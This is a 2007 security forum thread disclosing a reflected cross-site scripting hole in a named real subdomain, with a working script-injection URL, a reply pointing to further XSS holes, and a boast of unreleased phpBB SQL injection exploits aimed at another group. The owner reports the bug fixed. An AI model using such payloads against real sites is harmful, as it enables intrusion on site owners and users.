Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
XSS - csrf.0x000000.com
Posted by: Ras
Date: November 04, 2007 03:37PM

Yesterday I found this vuln and Nemessis told me to post here :P
Go to: http://www.0x000000.com/
Click on: "csrf database"
Then in the Search box write: Ras
Our link is like this:
http://csrf.0x000000.com/csrfdb.php?do=browse&order=searchstring
Delete "searchstring" and than put
"><script>alert(/Ras-www.rstzone.org/)</script>

http://csrf.0x000000.com/csrfdb.php?do=browse&order="><script>alert(/Ras-www.rstzone.org/)</script>

Works on: IE 7, Opera, Firefox :P

Sorry for my bad english!
-Ras



Edited 2 time(s). Last edit at 11/04/2007 04:01PM by Ronald.

Options: ReplyQuote
Re: XSS - http://www.0x000000.com/
Posted by: Anonymous User
Date: November 04, 2007 04:00PM

Yep useless bullshit on a subdomain I did not created, Ryan did.
want an award? come and get it personally.

Go here: browserfry.0x000000.com A lot more 1337 XSS holes for you.

Options: ReplyQuote
Re: XSS - csrf.0x000000.com
Posted by: Anonymous User
Date: November 04, 2007 04:02PM

And shut up while you guys at RST use PHPBB, I got some real exploits lying around for PHPBB3.0 (SQL injection) which the authors of PHPBB don't know about yet. You guys are vulnerable before you even realize it. That's ownage, owning without even trying, so watch out when you upgrade to PHPBB3.0

Options: ReplyQuote
Re: XSS - csrf.0x000000.com
Posted by: nemessis
Date: November 04, 2007 05:43PM

Ronald you have a private message. Thank you.

Options: ReplyQuote
Re: XSS - csrf.0x000000.com
Posted by: tehryan
Date: November 04, 2007 09:18PM

Fixed, Thanks.

Options: ReplyQuote


Sorry, only registered users may post in this forum.